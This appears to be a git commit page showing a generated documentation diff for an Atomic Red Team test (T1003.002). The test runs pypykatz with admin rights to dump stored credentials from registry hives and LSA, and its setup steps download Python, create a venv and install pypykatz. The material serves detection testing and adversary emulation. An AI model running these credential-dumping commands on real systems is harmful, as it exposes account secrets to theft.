security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2024-02-26 15:24:49 +00:00
parent c09d2a3748
commit e9b9f2ed7b
17 changed files with 451 additions and 262 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003.002/T1003.002.md
+26 -20
View File
@@ -82,7 +82,9 @@ del %temp%\security >nul 2> nul
<br/>
## Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
**Supported Platforms:** Windows
@@ -93,47 +95,51 @@ Parses registry hives to obtain stored credentials
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_002|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live registry
"#{venv_path}\Scripts\pypykatz" live lsa
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```
##### Description: Computer must have pip installed
##### Description: Computer must have venv configured at #{venv_path}
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```powershell
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```powershell
py -m venv "#{venv_path}"
```
##### Description: pypykatz must be installed and part of PATH
##### Description: pypykatz must be installed
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```powershell
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
```